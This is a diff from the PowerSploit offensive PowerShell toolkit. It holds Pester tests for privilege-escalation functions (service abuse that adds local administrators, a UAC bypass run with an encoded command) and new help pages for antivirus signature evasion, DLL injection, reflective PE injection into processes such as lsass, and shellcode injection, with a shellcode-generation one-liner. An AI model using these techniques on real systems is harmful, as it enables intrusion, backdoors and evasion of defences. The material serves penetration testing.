+        $Output = Get-UnquotedService | Where-Object { $_.ServiceName -eq $ServiceName }
         sc.exe delete $ServiceName | Should Match 'SUCCESS'
 
         $Output | Should BeNullOrEmpty
@@ -488,7 +590,7 @@ Describe 'Get-ServiceUnquoted' {
 
 Describe 'Get-ModifiableServiceFile' {
 
-    if(-not $(Test-IsAdmin)) { 
+    if (-not $(Test-IsAdmin)) {
         Throw "'Get-ModifiableServiceFile ' Pester test needs local administrator privileges."
     }
 
@@ -532,11 +634,11 @@ Describe 'Get-ModifiableServiceFile' {
                 Throw "Get-ModifiableServiceFile result doesn't contain 'CanRestart' field."
             }
 
-            if($Output.Path -ne $ServicePath) {
+            if ($Output.Path -ne $ServicePath) {
                 Throw "Get-ModifiableServiceFile result doesn't return correct Path for a modifiable service file."
             }
 
-            if($Output.ModifiableFile -ne $ServicePath) {
+            if ($Output.ModifiableFile -ne $ServicePath) {
                 Throw "Get-ModifiableServiceFile result doesn't return correct ModifiableFile for a modifiable service file."
             }
 
@@ -553,7 +655,7 @@ Describe 'Get-ModifiableServiceFile' {
 
 Describe 'Get-ModifiableService' {
 
-    if(-not $(Test-IsAdmin)) { 
+    if (-not $(Test-IsAdmin)) {
         Throw "'Get-ModifiableService' Pester test needs local administrator privileges."
     }
 
@@ -622,7 +724,7 @@ Describe 'Get-ServiceDetail' {
 
 Describe 'Invoke-ServiceAbuse' {
 
-    if(-not $(Test-IsAdmin)) { 
+    if (-not $(Test-IsAdmin)) {
         Throw "'Invoke-ServiceAbuse' Pester test needs local administrator privileges."
     }
 
@@ -640,7 +742,7 @@ Describe 'Invoke-ServiceAbuse' {
         $Output = Invoke-ServiceAbuse -Name 'PowerUpService'
         $Output.Command | Should Match 'net'
 
-        if( -not ($(net localgroup Administrators) -match 'john')) {
+        if ( -not ($(net localgroup Administrators) -match 'john')) {
             Throw "Local user 'john' not created."
         }
     }
@@ -649,7 +751,7 @@ Describe 'Invoke-ServiceAbuse' {
         $Output = Invoke-ServiceAbuse -Name 'PowerUpService' -Force
         $Output.Command | Should Match 'net'
 
-        if( -not ($(net localgroup Administrators) -match 'john')) {
+        if ( -not ($(net localgroup Administrators) -match 'john')) {
             Throw "Local user 'john' not created."
         }
     }
@@ -658,7 +760,7 @@ Describe 'Invoke-ServiceAbuse' {
         $Output = 'PowerUpService' | Invoke-ServiceAbuse
         $Output.Command | Should Match 'net'
 
-        if( -not ($(net localgroup Administrators) -match 'john')) {
+        if ( -not ($(net localgroup Administrators) -match 'john')) {
             Throw "Local user 'john' not created."
         }
     }
@@ -667,7 +769,7 @@ Describe 'Invoke-ServiceAbuse' {
         $Output = Get-Service 'PowerUpService' | Invoke-ServiceAbuse
         $Output.Command | Should Match 'net'
 
-        if( -not ($(net localgroup Administrators) -match 'john')) {
+        if ( -not ($(net localgroup Administrators) -match 'john')) {
             Throw "Local user 'john' not created."
         }
     }
@@ -675,7 +777,7 @@ Describe 'Invoke-ServiceAbuse' {
     It 'User should not be created for a non-existent service.' {
         {Invoke-ServiceAbuse -ServiceName 'NonExistentService456'} | Should Throw
 
-        if( ($(net localgroup Administrators) -match 'john')) {
+        if ( ($(net localgroup Administrators) -match 'john')) {
             Throw "Local user 'john' should not have been created for non-existent service."
         }
     }
@@ -684,7 +786,7 @@ Describe 'Invoke-ServiceAbuse' {
         $Output = Invoke-ServiceAbuse -ServiceName 'PowerUpService' -Username 'PowerUp' -Password 'PASSword123!'
         $Output.Command | Should Match 'net'
 
-        if( -not ($(net localgroup Administrators) -match 'PowerUp')) {
+        if ( -not ($(net localgroup Administrators) -match 'PowerUp')) {
             Throw "Local user 'PowerUp' not created."
         }
         $Null = $(net user PowerUp /delete >$Null 2>&1)
@@ -698,7 +800,7 @@ Describe 'Invoke-ServiceAbuse' {
         $Output = Invoke-ServiceAbuse -ServiceName 'PowerUpService' -Credential $Credential
         $Output.Command | Should Match 'net'
 
-        if( -not ($(net localgroup Administrators) -match 'PowerUp')) {
+        if ( -not ($(net localgroup Administrators) -match 'PowerUp')) {
             Throw "Local user 'PowerUp' not created."
         }
         $Null = $(net user PowerUp123 /delete >$Null 2>&1)
@@ -708,7 +810,7 @@ Describe 'Invoke-ServiceAbuse' {
         $Output = Invoke-ServiceAbuse -Name 'PowerUpService' -LocalGroup 'Guests'
         $Output.Command | Should Match 'net'
 
-        if( -not ($(net localgroup Guests) -match 'john')) {
+        if ( -not ($(net localgroup Guests) -match 'john')) {
             Throw "Local user 'john' not added to 'Guests'."
         }
     }
@@ -717,7 +819,7 @@ Describe 'Invoke-ServiceAbuse' {
         $FilePath = "$(Get-Location)\$([IO.Path]::GetRandomFileName())"
         $Output = Invoke-ServiceAbuse -ServiceName 'PowerUpService' -Command 'net user testing Password123! /add'
 
-        if( -not ($(net user) -match "testing")) {
+        if ( -not ($(net user) -match "testing")) {
             Throw 'Custom command failed.'
         }
         $Null = $(net user testing /delete >$Null 2>&1)
@@ -727,7 +829,7 @@ Describe 'Invoke-ServiceAbuse' {
 
 Describe 'Install-ServiceBinary' {
 
-    if(-not $(Test-IsAdmin)) { 
+    if (-not $(Test-IsAdmin)) {
         Throw "'Install-ServiceBinary' Pester test needs local administrator privileges."
     }
 
@@ -744,10 +846,10 @@ Describe 'Install-ServiceBinary' {
             $Null = $(net user john /delete >$Null 2>&1)
         }
         finally {
-            if(Test-Path "$(Get-Location)\powerup.exe") {
+            if (Test-Path "$(Get-Location)\powerup.exe") {
                 $Null = Remove-Item -Path "$(Get-Location)\powerup.exe" -Force -ErrorAction SilentlyContinue
             }
-            if(Test-Path "$(Get-Location)\powerup.exe.bak") {
+            if (Test-Path "$(Get-Location)\powerup.exe.bak") {
                 $Null = Remove-Item -Path "$(Get-Location)\powerup.exe.bak" -Force -ErrorAction SilentlyContinue
             }
         }
@@ -759,7 +861,7 @@ Describe 'Install-ServiceBinary' {
 
         $Null = Start-Service -Name PowerUpService -ErrorAction SilentlyContinue
         Start-Sleep -Seconds 3
-        if( -not ($(net localgroup Administrators) -match 'john')) {
+        if ( -not ($(net localgroup Administrators) -match 'john')) {
             Throw "Local user 'john' not created."
         }
         $Null = Stop-Service -Name PowerUpService -Force
@@ -774,7 +876,7 @@ Describe 'Install-ServiceBinary' {
 
         $Null = Start-Service -Name PowerUpService -ErrorAction SilentlyContinue
         Start-Sleep -Seconds 3
-        if( -not ($(net localgroup Administrators) -match 'john')) {
+        if ( -not ($(net localgroup Administrators) -match 'john')) {
             Throw "Local user 'john' not created."
         }
         $Null = Stop-Service -Name PowerUpService -Force
@@ -789,7 +891,7 @@ Describe 'Install-ServiceBinary' {
 
         $Null = Start-Service -Name PowerUpService -ErrorAction SilentlyContinue
         Start-Sleep -Seconds 3
-        if( -not ($(net localgroup Administrators) -match 'john')) {
+        if ( -not ($(net localgroup Administrators) -match 'john')) {
             Throw "Local user 'john' not created."
         }
         $Null = Stop-Service -Name PowerUpService -Force
@@ -801,7 +903,7 @@ Describe 'Install-ServiceBinary' {
     It 'User should not be created for a non-existent service.' {
         {Install-ServiceBinary -ServiceName "NonExistentService456"} | Should Throw
         
-        if( ($(net localgroup Administrators) -match 'john')) {
+        if ( ($(net localgroup Administrators) -match 'john')) {
             Throw "Local user 'john' should not have been created for non-existent service."
         }
     }
@@ -813,7 +915,7 @@ Describe 'Install-ServiceBinary' {
 
             $Null = Start-Service -Name PowerUpService -ErrorAction SilentlyContinue
             Start-Sleep -Seconds 3
-            if( -not ($(net localgroup Administrators) -match 'PowerUp')) {
+            if ( -not ($(net localgroup Administrators) -match 'PowerUp')) {
                 Throw "Local user 'PowerUp' not created."
             }
 
@@ -835,7 +937,7 @@ Describe 'Install-ServiceBinary' {
 
         $Null = Start-Service -Name PowerUpService -ErrorAction SilentlyContinue
         Start-Sleep -Seconds 3
-        if( -not ($(net localgroup Administrators) -match 'PowerUp123')) {
+        if ( -not ($(net localgroup Administrators) -match 'PowerUp123')) {
             Throw "Local user 'PowerUp123' not created."
         }
         $Null = $(net user PowerUp123 /delete >$Null 2>&1)
@@ -851,7 +953,7 @@ Describe 'Install-ServiceBinary' {
 
             $Null = Start-Service -Name PowerUpService -ErrorAction SilentlyContinue
             Start-Sleep -Seconds 3
-            if( -not ($(net localgroup Guests) -match 'PowerUp')) {
+            if ( -not ($(net localgroup Guests) -match 'PowerUp')) {
                 Throw "Local user 'PowerUp' not created."
             }
 
@@ -870,7 +972,7 @@ Describe 'Install-ServiceBinary' {
 
             $Null = Start-Service -Name PowerUpService -ErrorAction SilentlyContinue
             Start-Sleep -Seconds 3
-            if( -not ($(net user) -match "testing")) {
+            if ( -not ($(net user) -match "testing")) {
                 Throw "Custom command failed."
             }
         
@@ -883,6 +985,7 @@ Describe 'Install-ServiceBinary' {
     }
 }
 
+# TODO: Describe 'Restore-ServiceBinary' {}
 
 ########################################################
 #
@@ -908,7 +1011,7 @@ Describe 'Find-ProcessDLLHijack' {
 
 Describe 'Find-PathDLLHijack' {
 
-    if(-not $(Test-IsAdmin)) { 
+    if (-not $(Test-IsAdmin)) {
         Throw "'Find-PathDLLHijack' Pester test needs local administrator privileges."
     }
 
@@ -1010,7 +1113,7 @@ Describe 'Get-RegistryAutoLogon' {
 
 Describe 'Get-ModifiableRegistryAutoRun' {
 
-    if(-not $(Test-IsAdmin)) { 
+    if (-not $(Test-IsAdmin)) {
         Throw "'Get-ModifiableRegistryAutoRun' Pester test needs local administrator privileges."
     }
 
@@ -1065,7 +1168,7 @@ Describe 'Get-ModifiableRegistryAutoRun' {
 
 Describe 'Get-ModifiableScheduledTaskFile' {
 
-    if(-not $(Test-IsAdmin)) { 
+    if (-not $(Test-IsAdmin)) {
         Throw "'Get-ModifiableScheduledTaskFile' Pester test needs local administrator privileges."
     }
 
@@ -1114,7 +1217,7 @@ Describe 'Get-ModifiableScheduledTaskFile' {
 
 Describe 'Get-UnattendedInstallFile' {
 
-    if(-not $(Test-IsAdmin)) { 
+    if (-not $(Test-IsAdmin)) {
         Throw "'Get-UnattendedInstallFile' Pester test needs local administrator privileges."
     }
 
@@ -1239,7 +1342,7 @@ Describe 'Get-SiteListPassword' {
 
 Describe 'Get-CachedGPPPassword' {
 
-    if(-not $(Test-IsAdmin)) { 
+    if (-not $(Test-IsAdmin)) {
         Throw "'Get-CachedGPPPassword' Pester test needs local administrator privileges."
     }
 
@@ -1262,14 +1365,39 @@ Describe 'Get-CachedGPPPassword' {
     }
 }
 
+# TODO: Describe 'Write-UserAddMSI' {}
+
+Describe 'Invoke-WScriptUACBypass' {
+    $OSVersion = [Environment]::OSVersion.Version
+    if (($OSVersion -ge (New-Object 'Version' 6,0)) -and ($OSVersion -lt (New-Object 'Version' 6,2))) {
+        It 'Should launch an elevated command.' {
+            Invoke-WScriptUACBypass -Command 'powershell -enc JwAxADIAMwAnACAAfAAgAE8AdQB0AC0ARgBpAGwAZQAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAUwB5AHMAdABlAG0AMwAyAFwAcwBrAGEAZABqAGYAbgAuAHQAeAB0ACIA'
+            if (-not (Test-Path -Path "C:\Windows\System32\skadjfn.txt")) {
+                Throw "'Invoke-WScriptUACBypass' did not write a privileged file."
+            }
+            {Test-Path -Path "C:\Windows\System32\skadjfn.txt"} | Should Not Throw
+            Remove-Item -Path "C:\Windows\System32\skadjfn.txt" -Force
+        }
+
+        It "Should accept -WindowStyle 'Visible'" {
+            Invoke-WScriptUACBypass -Command notepad.exe -WindowStyle 'Visible'
+            $Process = Get-Process 'notepad'
+            $Process | Should Not BeNullOrEmpty
+            $Process | Stop-Process -Force
+        }
+    }
+    else {
+        Write-Warning 'Target machine is not vulnerable to Invoke-WScriptUACBypass.'
+    }
+}
 
-Describe 'Invoke-AllChecks' {
+Describe 'Invoke-PrivescAudit' {
     It 'Should return results to stdout.' {
-        $Output = Invoke-AllChecks
+        $Output = Invoke-PrivescAudit
         $Output | Should Not BeNullOrEmpty
     }
     It 'Should produce a HTML report with -HTMLReport.' {
-        $Output = Invoke-AllChecks -HTMLReport
+        $Output = Invoke-PrivescAudit -HTMLReport
         $Output | Should Not BeNullOrEmpty
 
         $HtmlReportFile = "$($Env:ComputerName).$($Env:UserName).html"
@@ -1282,7 +1410,7 @@ Describe 'Invoke-AllChecks' {
 
 Describe 'Get-System' {
 
-    if(-not $(Test-IsAdmin)) { 
+    if (-not $(Test-IsAdmin)) {
         Throw "'Get-System' Pester test needs local administrator privileges."
     }
 
diff --git a/docs/AntivirusBypass/Find-AVSignature.md b/docs/AntivirusBypass/Find-AVSignature.md
new file mode 100755
index 0000000..1606154
--- /dev/null
+++ b/docs/AntivirusBypass/Find-AVSignature.md
@@ -0,0 +1,158 @@
+# Find-AVSignature

+

+## SYNOPSIS

+Locate tiny AV signatures.

+

+PowerSploit Function: Find-AVSignature  

+Authors: Chris Campbell (@obscuresec) & Matt Graeber (@mattifestation)  

+License: BSD 3-Clause  

+Required Dependencies: None  

+Optional Dependencies: None

+

+## SYNTAX

+

+```

+Find-AVSignature [-StartByte] <UInt32> [-EndByte] <String> [-Interval] <UInt32> [[-Path] <String>]

+ [[-OutPath] <String>] [[-BufferLen] <UInt32>] [-Force]

+```

+

+## DESCRIPTION

+Locates single Byte AV signatures utilizing the same method as DSplit from "class101" on heapoverflow.com.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Find-AVSignature -Startbyte 0 -Endbyte max -Interval 10000 -Path c:\test\exempt\nc.exe

+```

+

+Find-AVSignature -StartByte 10000 -EndByte 20000 -Interval 1000 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run2 -Verbose

+Find-AVSignature -StartByte 16000 -EndByte 17000 -Interval 100 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run3 -Verbose

+Find-AVSignature -StartByte 16800 -EndByte 16900 -Interval 10 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run4 -Verbose

+Find-AVSignature -StartByte 16890 -EndByte 16900 -Interval 1 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run5 -Verbose

+

+## PARAMETERS

+

+### -StartByte

+Specifies the first byte to begin splitting on.

+

+```yaml

+Type: UInt32

+Parameter Sets: (All)

+Aliases: 

+

+Required: True

+Position: 1

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -EndByte

+Specifies the last byte to split on.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: True

+Position: 2

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Interval

+Specifies the interval size to split with.

+

+```yaml

+Type: UInt32

+Parameter Sets: (All)

+Aliases: 

+

+Required: True

+Position: 3

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Path

+Specifies the path to the binary you want tested.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 4

+Default value: ($pwd.path)

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -OutPath

+Optionally specifies the directory to write the binaries to.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 5

+Default value: ($pwd)

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -BufferLen

+Specifies the length of the file read buffer . 

+Defaults to 64KB.

+

+```yaml

+Type: UInt32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 6

+Default value: 65536

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Force

+Forces the script to continue without confirmation.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+## NOTES

+Several of the versions of "DSplit.exe" available on the internet contain malware.

+

+## RELATED LINKS

+

+[http://obscuresecurity.blogspot.com/2012/12/finding-simple-av-signatures-with.html

+https://github.com/mattifestation/PowerSploit

+http://www.exploit-monday.com/

+http://heapoverflow.com/f0rums/project.php?issueid=34&filter=changes&page=2](http://obscuresecurity.blogspot.com/2012/12/finding-simple-av-signatures-with.html

+https://github.com/mattifestation/PowerSploit

+http://www.exploit-monday.com/

+http://heapoverflow.com/f0rums/project.php?issueid=34&filter=changes&page=2)

+

diff --git a/docs/CodeExecution/Invoke-DllInjection.md b/docs/CodeExecution/Invoke-DllInjection.md
new file mode 100755
index 0000000..d41bf31
--- /dev/null
+++ b/docs/CodeExecution/Invoke-DllInjection.md
@@ -0,0 +1,79 @@
+# Invoke-DllInjection

+

+## SYNOPSIS

+Injects a Dll into the process ID of your choosing.

+

+PowerSploit Function: Invoke-DllInjection  

+Author: Matthew Graeber (@mattifestation)  

+License: BSD 3-Clause  

+Required Dependencies: None  

+Optional Dependencies: None

+

+## SYNTAX

+

+```

+Invoke-DllInjection [-ProcessID] <Int32> [-Dll] <String>

+```

+

+## DESCRIPTION

+Invoke-DllInjection injects a Dll into an arbitrary process.

+It does this by using VirtualAllocEx to allocate memory the size of the

+DLL in the remote process, writing the names of the DLL to load into the

+remote process spacing using WriteProcessMemory, and then using RtlCreateUserThread

+to invoke LoadLibraryA in the context of the remote process.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Invoke-DllInjection -ProcessID 4274 -Dll evil.dll

+```

+

+Description

+-----------

+Inject 'evil.dll' into process ID 4274.

+

+## PARAMETERS

+

+### -ProcessID

+Process ID of the process you want to inject a Dll into.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: True

+Position: 1

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Dll

+Name of the dll to inject.

+This can be an absolute or relative path.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: True

+Position: 2

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+## NOTES

+Use the '-Verbose' option to print detailed information.

+

+## RELATED LINKS

+

+[http://www.exploit-monday.com](http://www.exploit-monday.com)

+

diff --git a/docs/CodeExecution/Invoke-ReflectivePEInjection.md b/docs/CodeExecution/Invoke-ReflectivePEInjection.md
new file mode 100755
index 0000000..aee653d
--- /dev/null
+++ b/docs/CodeExecution/Invoke-ReflectivePEInjection.md
@@ -0,0 +1,300 @@
+# Invoke-ReflectivePEInjection

+

+## SYNOPSIS

+This script has two modes.

+It can reflectively load a DLL/EXE in to the PowerShell process,

+or it can reflectively load a DLL in to a remote process.

+These modes have different parameters and constraints,

+please lead the Notes section (GENERAL NOTES) for information on how to use them.

+

+1.)Reflectively loads a DLL or EXE in to memory of the Powershell process.

+Because the DLL/EXE is loaded reflectively, it is not displayed when tools are used to list the DLLs of a running process.

+

+This tool can be run on remote servers by supplying a local Windows PE file (DLL/EXE) to load in to memory on the remote system,

+this will load and execute the DLL/EXE in to memory without writing any files to disk.

+

+2.) Reflectively load a DLL in to memory of a remote process.

+As mentioned above, the DLL being reflectively loaded won't be displayed when tools are used to list DLLs of the running remote process.

+

+This is probably most useful for injecting backdoors in SYSTEM processes in Session0.

+Currently, you cannot retrieve output

+from the DLL.

+The script doesn't wait for the DLL to complete execution, and doesn't make any effort to cleanup memory in the

+remote process.

+

+PowerSploit Function: Invoke-ReflectivePEInjection  

+Author: Joe Bialek, Twitter: @JosephBialek  

+Code review and modifications: Matt Graeber, Twitter: @mattifestation  

+License: BSD 3-Clause  

+Required Dependencies: None  

+Optional Dependencies: None

+

+## SYNTAX

+

+```

+Invoke-ReflectivePEInjection [-PEBytes] <Byte[]> [[-ComputerName] <String[]>] [[-FuncReturnType] <String>]

+ [[-ExeArgs] <String>] [[-ProcId] <Int32>] [[-ProcName] <String>] [-ForceASLR] [-DoNotZeroMZ]

+```

+

+## DESCRIPTION

+Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Load DemoDLL and run the exported function WStringFunc on Target.local, print the wchar_t* returned by WStringFunc().

+```

+

+$PEBytes = \[IO.File\]::ReadAllBytes('DemoDLL.dll')

+Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName Target.local

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Load DemoDLL and run the exported function WStringFunc on all computers in the file targetlist.txt. Print

+```

+

+the wchar_t* returned by WStringFunc() from all the computers.

+$PEBytes = \[IO.File\]::ReadAllBytes('DemoDLL.dll')

+Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName (Get-Content targetlist.txt)

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+Load DemoEXE and run it locally.

+```

+

+$PEBytes = \[IO.File\]::ReadAllBytes('DemoEXE.exe')

+Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4"

+

+### -------------------------- EXAMPLE 4 --------------------------

+```

+Load DemoEXE and run it locally. Forces ASLR on for the EXE.

+```

+

+$PEBytes = \[IO.File\]::ReadAllBytes('DemoEXE.exe')

+Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4" -ForceASLR

+

+### -------------------------- EXAMPLE 5 --------------------------

+```

+Refectively load DemoDLL_RemoteProcess.dll in to the lsass process on a remote computer.

+```

+

+$PEBytes = \[IO.File\]::ReadAllBytes('DemoDLL_RemoteProcess.dll')

+Invoke-ReflectivePEInjection -PEBytes $PEBytes -ProcName lsass -ComputerName Target.Local

+

+## PARAMETERS

+

+### -PEBytes

+A byte array containing a DLL/EXE to load and execute.

+

+```yaml

+Type: Byte[]

+Parameter Sets: (All)

+Aliases: 

+

+Required: True

+Position: 1

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ComputerName

+Optional, an array of computernames to run the script on.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 2

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -FuncReturnType

+Optional, the return type of the function being called in the DLL.

+Default: Void

+    Options: String, WString, Void.

+See notes for more information.

+    IMPORTANT: For DLLs being loaded remotely, only Void is supported.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 3

+Default value: Void

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ExeArgs

+Optional, arguments to pass to the executable being reflectively loaded.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 4

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ProcId

+Optional, the process ID of the remote process to inject the DLL in to.

+If not injecting in to remote process, ignore this.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 5

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ProcName

+Optional, the name of the remote process to inject the DLL in to.

+If not injecting in to remote process, ignore this.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 6

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ForceASLR

+Optional, will force the use of ASLR on the PE being loaded even if the PE indicates it doesn't support ASLR.

+Some PE's will work with ASLR even

+    if the compiler flags don't indicate they support it.

+Other PE's will simply crash.

+Make sure to test this prior to using.

+Has no effect when

+    loading in to a remote process.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -DoNotZeroMZ

+Optional, will not wipe the MZ from the first two bytes of the PE.

+This is to be used primarily for testing purposes and to enable loading the same PE with Invoke-ReflectivePEInjection more than once.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+## NOTES

+GENERAL NOTES:

+The script has 3 basic sets of functionality:

+1.) Reflectively load a DLL in to the PowerShell process

+    -Can return DLL output to user when run remotely or locally.

+    -Cleans up memory in the PS process once the DLL finishes executing.

+    -Great for running pentest tools on remote computers without triggering process monitoring alerts.

+    -By default, takes 3 function names, see below (DLL LOADING NOTES) for more info.

+2.) Reflectively load an EXE in to the PowerShell process.

+    -Can NOT return EXE output to user when run remotely.

+If remote output is needed, you must use a DLL.

+CAN return EXE output if run locally.

+    -Cleans up memory in the PS process once the DLL finishes executing.

+    -Great for running existing pentest tools which are EXE's without triggering process monitoring alerts.

+3.) Reflectively inject a DLL in to a remote process.

+    -Can NOT return DLL output to the user when run remotely OR locally.

+    -Does NOT clean up memory in the remote process if/when DLL finishes execution.

+    -Great for planting backdoor on a system by injecting backdoor DLL in to another processes memory.

+    -Expects the DLL to have this function: void VoidFunc().

+This is the function that will be called after the DLL is loaded.

+

+DLL LOADING NOTES:

+

+PowerShell does not capture an applications output if it is output using stdout, which is how Windows console apps output.

+If you need to get back the output from the PE file you are loading on remote computers, you must compile the PE file as a DLL, and have the DLL

+return a char* or wchar_t*, which PowerShell can take and read the output from.

+Anything output from stdout which is run using powershell

+remoting will not be returned to you.

+If you just run the PowerShell script locally, you WILL be able to see the stdout output from

+applications because it will just appear in the console window.

+The limitation only applies when using PowerShell remoting.

+

+For DLL Loading:

+Once this script loads the DLL, it calls a function in the DLL.

+There is a section near the bottom labeled "YOUR CODE GOES HERE"

+I recommend your DLL take no parameters.

+I have prewritten code to handle functions which take no parameters are return

+the following types: char*, wchar_t*, and void.

+If the function returns char* or wchar_t* the script will output the

+returned data.

+The FuncReturnType parameter can be used to specify which return type to use.

+The mapping is as follows:

+wchar_t*   : FuncReturnType = WString

+char*      : FuncReturnType = String

+void       : Default, don't supply a FuncReturnType

+

+For the whcar_t* and char_t* options to work, you must allocate the string to the heap.

+Don't simply convert a string

+using string.c_str() because it will be allocaed on the stack and be destroyed when the DLL returns.

+

+The function name expected in the DLL for the prewritten FuncReturnType's is as follows:

+WString    : WStringFunc

+String     : StringFunc

+Void       : VoidFunc

+

+These function names ARE case sensitive.

+To create an exported DLL function for the wstring type, the function would

+be declared as follows:

+extern "C" __declspec( dllexport ) wchar_t* WStringFunc()

+

+

+If you want to use a DLL which returns a different data type, or which takes parameters, you will need to modify

+this script to accomodate this.

+You can find the code to modify in the section labeled "YOUR CODE GOES HERE".

+

+Find a DemoDLL at: https://github.com/clymb3r/PowerShell/tree/master/Invoke-ReflectiveDllInjection

+

+## RELATED LINKS

+

+[http://clymb3r.wordpress.com/2013/04/06/reflective-dll-injection-with-powershell/

+

+Blog on modifying mimikatz for reflective loading: http://clymb3r.wordpress.com/2013/04/09/modifying-mimikatz-to-be-loaded-using-invoke-reflectivedllinjection-ps1/

+Blog on using this script as a backdoor with SQL server: http://www.casaba.com/blog/](http://clymb3r.wordpress.com/2013/04/06/reflective-dll-injection-with-powershell/

+

+Blog on modifying mimikatz for reflective loading: http://clymb3r.wordpress.com/2013/04/09/modifying-mimikatz-to-be-loaded-using-invoke-reflectivedllinjection-ps1/

+Blog on using this script as a backdoor with SQL server: http://www.casaba.com/blog/)

+

diff --git a/docs/CodeExecution/Invoke-Shellcode.md b/docs/CodeExecution/Invoke-Shellcode.md
new file mode 100755
index 0000000..7240a4c
--- /dev/null
+++ b/docs/CodeExecution/Invoke-Shellcode.md
@@ -0,0 +1,116 @@
+# Invoke-Shellcode

+

+## SYNOPSIS

+Inject shellcode into the process ID of your choosing or within the context of the running PowerShell process.

+

+PowerSploit Function: Invoke-Shellcode  

+Author: Matthew Graeber (@mattifestation)  

+License: BSD 3-Clause  

+Required Dependencies: None  

+Optional Dependencies: None

+

+## SYNTAX

+

+```

+Invoke-Shellcode [-ProcessID <UInt16>] [-Shellcode <Byte[]>] [-Force]

+```

+

+## DESCRIPTION

+Portions of this project was based upon syringe.c v1.2 written by Spencer McIntyre

+

+PowerShell expects shellcode to be in the form 0xXX,0xXX,0xXX.

+To generate your shellcode in this form, you can use this command from within Backtrack (Thanks, Matt and g0tm1lk):

+

+msfpayload windows/exec CMD="cmd /k calc" EXITFUNC=thread C | sed '1,6d;s/\[";\]//g;s/\\\\/,0/g' | tr -d '\n' | cut -c2-

+

+Make sure to specify 'thread' for your exit process.

+Also, don't bother encoding your shellcode.

+It's entirely unnecessary.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Invoke-Shellcode -ProcessId 4274

+```

+

+Description

+-----------

+Inject shellcode into process ID 4274.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Invoke-Shellcode

+```

+

+Description

+-----------

+Inject shellcode into the running instance of PowerShell.

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+Invoke-Shellcode -Shellcode @(0x90,0x90,0xC3)

+```

+

+Description

+-----------

+Overrides the shellcode included in the script with custom shellcode - 0x90 (NOP), 0x90 (NOP), 0xC3 (RET)

+Warning: This script has no way to validate that your shellcode is 32 vs.

+64-bit!

+

+## PARAMETERS

+

+### -ProcessID

+Process ID of the process you want to inject shellcode into.

+

+```yaml

+Type: UInt16

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Shellcode

+Specifies an optional shellcode passed in as a byte array

+

+```yaml

+Type: Byte[]

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Force

+Injects shellcode without prompting for confirmation.

